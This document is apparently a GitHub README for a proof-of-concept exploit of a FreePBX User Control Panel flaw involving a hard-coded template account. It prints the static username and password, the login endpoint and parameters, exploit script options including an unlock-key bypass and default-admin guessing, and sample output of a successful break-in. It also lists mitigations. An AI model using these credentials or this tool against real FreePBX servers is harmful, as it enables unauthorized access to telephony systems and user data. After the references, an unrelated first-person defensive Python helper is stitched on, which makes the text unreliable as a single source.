portbuster1337/CVE-2026-46376

GitHub: portbuster1337/CVE-2026-46376

Stars: 0 | Forks: 0

# CVE-2026-46376 — FreePBX Unauthenticated UCP Access via Hard-Coded Credentials

A critical vulnerability in FreePBX's User Management (`userman`) module allows unauthenticated attackers to access the User Control Panel (UCP) using hard-coded credentials that are embedded during the UCP generic template setup process.

**CVSS v4.0: 9.1 (Critical)** | **CWE-798: Use of Hard-Coded Credentials**

Disclosed: May 15, 2026 | Reporter: [s0nnyWT](https://github.com/s0nnyWT)

## Details

When an administrator uses the optional UCP generic template setup feature (introduced in 2021), a system user `FreePBXUCPTemplateCreator` is created with a **hard-coded, static password**. If the administrator never changes this password after setup, any unauthenticated user on the network can log into the UCP with these credentials.

| Field | Value |
|-------|-------|
| Username | `FreePBXUCPTemplateCreator` |
| Password | `1a2b3c@fd48jshs03123ld` |
| Source | `Userman.class.php` — password passed through `md5()` |
| Attack Vector | Network |
| Complexity | Low |
| Auth Required | None |
| User Interaction | None |
| Prerequisite | Admin must have run the UCP generic template setup |

## Affected Versions

| Platform | userman module | Affected | Patched |
|----------|----------------|----------|---------|
| FreePBX 15 | — | 15.0.42+ | N/A |
| FreePBX 16 | userman | ≤ 16.0.44 | 16.0.45 |
| FreePBX 17 | userman | ≤ 17.0.6 | 17.0.7 |

The fix randomizes the password using `bin2hex(random_bytes(24))` during install/upgrade, and existing template creators get their password regenerated on upgrade.

## PoC Usage

```
pip3 install requests
python3 poc.py
```

### Options

```
positional arguments:
  target                Target URL (e.g. http://192.168.1.100)

optional arguments:
  -h, --help            show this help message and exit
  --no-check            Skip version pre-flight check
  --timeout TIMEOUT     Request timeout in seconds (default: 15)
  --method {creds,unlock,admin,all}
                        Which exploit method to run (default: all)
  -y, --yes             Auto-continue even if version is out of range
```

### Methods

1. **creds** — Log in to UCP via `POST /ucp/ajax.php` with `module=User&command=login` using the hard-coded credentials
2. **unlock** — Attempt unlock key bypass via `?unlockkey=&templateid=` query parameters
3. **admin** — Try common default admin credentials on the ACP

## Example

```
$ python3 poc.py http://192.168.1.100
============================================
CVE-2026-46376 PoC - FreePBX UCP Access
Target: http://192.168.1.100
============================================
[+] Target is reachable (HTTP 200)
[+] FreePBX version: 16.0.30
[+] Version 16.0.30 is in the affected range
[+] UCP interface is accessible

============================================
Exploitation
============================================

============================================
Method 1: Hard-Coded UCP Credentials
============================================
Username: FreePBXUCPTemplateCreator
Password: 1a2b3c@fd48jshs03123ld
[+] Got CSRF token: a749bea059fa66bd32087a8481a4d07b
[+] SUCCESS! Logged in as FreePBXUCPTemplateCreator

============================================
Summary
============================================
Target is VULNERABLE
```

## Detection

To check if a system is exploitable, the PoC sends a login request to `POST /ucp/ajax.php` with `module=User&command=login` and the credentials. A `{"status":true}` response indicates the template creator user exists and the password is still the default.

A `{"status":false,"message":"Invalid Login Credentials"}` response means either:

- The user does not exist (template setup was never run), or
- The password has already been rotated

## Mitigation

- Update the `userman` module to 16.0.45 (FreePBX 16) or 17.0.7 (FreePBX 17)
- Verify and rotate any existing UCP template credentials — patching does NOT retroactively change already-deployed passwords
- Restrict ACP/UCP access to trusted networks using the FreePBX Firewall module
- Enable MFA or SAML for additional authentication layers
- Audit active UCP sessions for unauthorized logins

## Disclaimer

This PoC is provided for **educational and authorized security testing purposes only**. Unauthorized use of this exploit against systems you do not own or have explicit permission to test is illegal. The authors are not responsible for any misuse or damage caused by this tool.

## References

- [GHSA-m55x-h47x-v3gx](https://github.com/FreePBX/security-reporting/security/advisories/GHSA-m55x-h47x-v3gx)
- [NVD - CVE-2026-46376](https://nvd.nist.gov/vuln/detail/CVE-2026-46376)
- [FreePBX userman commit (introduced)](https://github.com/FreePBX/userman/commit/7aa066e99210836e5c223b4f8b7be973ab5ad783)
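As an added defender-side helper (not part of this PoC or of FreePBX's own code), the Python below encodes the Affected Versions table and interprets the two login responses described under Detection, so an operator can triage a reported `userman` version and a captured response body without running the exploit. Version ranges and response shapes come from this README; the function names and the constructed inputs in the comments are my own.

```python
import json
from typing import Optional, Tuple

# Per major branch: (first affected version, first patched version), taken from
# the Affected Versions table. None for "patched" means no fixed release exists
# for that branch (FreePBX 15 is listed as 15.0.42+ affected, patch N/A).
AFFECTED = {
    15: ((15, 0, 42), None),
    16: (None, (16, 0, 45)),
    17: (None, (17, 0, 7)),
}


def parse_version(text: str) -> Tuple[int, ...]:
    """Turn '16.0.30' into (16, 0, 30); a non-numeric tail such as '-beta' is dropped."""
    parts = []
    for piece in text.strip().split("."):
        digits = "".join(ch for ch in piece if ch.isdigit())
        if not digits:
            break
        parts.append(int(digits))
    if not parts:
        raise ValueError(f"unparseable version: {text!r}")
    return tuple(parts)


def is_affected(version: str) -> Optional[bool]:
    """True if this userman version is in the advisory's affected range,
    False if it predates the range or is at/after the patched release,
    None if the advisory says nothing about that major branch."""
    ver = parse_version(version)
    branch = AFFECTED.get(ver[0])
    if branch is None:
        return None
    first_affected, first_patched = branch
    if first_affected is not None and ver < first_affected:
        return False
    if first_patched is not None and ver >= first_patched:
        return False
    return True


def classify_login_response(body: str) -> str:
    """Map the JSON the UCP login endpoint returns (shapes as given in Detection)
    to a triage label: status true means the default password is still live."""
    try:
        data = json.loads(body)
    except json.JSONDecodeError:
        return "unexpected"
    if data.get("status") is True:
        return "default-credential-active"
    if data.get("status") is False:
        return "absent-or-rotated"   # user never created, or password rotated
    return "unexpected"
```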